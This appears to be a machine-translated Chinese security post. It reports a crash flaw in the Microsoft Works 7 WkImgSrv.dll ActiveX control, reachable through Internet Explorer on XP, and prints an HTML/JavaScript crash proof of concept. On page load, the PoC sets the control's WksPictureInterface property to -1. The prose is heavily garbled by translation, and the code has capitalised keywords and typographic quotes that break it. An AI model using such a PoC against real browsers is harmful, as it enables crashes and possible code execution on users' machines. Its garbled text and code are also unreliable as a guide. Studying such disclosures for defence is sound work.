Chinese
MS Works of out of problem of IE 0day flaw
From;    Author:Stand originally
Circulating a fokelore is the POC code of IE0DAY on the network in last few days, connect below XP system environment killed IE6 and IE7, other system did not pass a test. Actually this flaw is not consist in IE, however the component of Microsoft Works is dug to give flaw, partial XP installed Microsoft Works beforehand, the flaw that appeared to pass complete patch system so (if Hua Shuo is easy,PC installed Microsoft Works beforehand) .

The DLL version of the influence: Microsoft Works 7 WkImgSrv.dll (7.03.0616.0)

It is Crash POC below

<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll Crash POC</title>
<script Language=”JavaScript”>
Function Payload() {
Var Num = -1;
Obj.WksPictureInterface = Num;
}
</script>
</head>
<body Onload=”JavaScript: Return Payload();”>
<object Classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″Id=”obj”>
</object>
</body>
</html>

[1]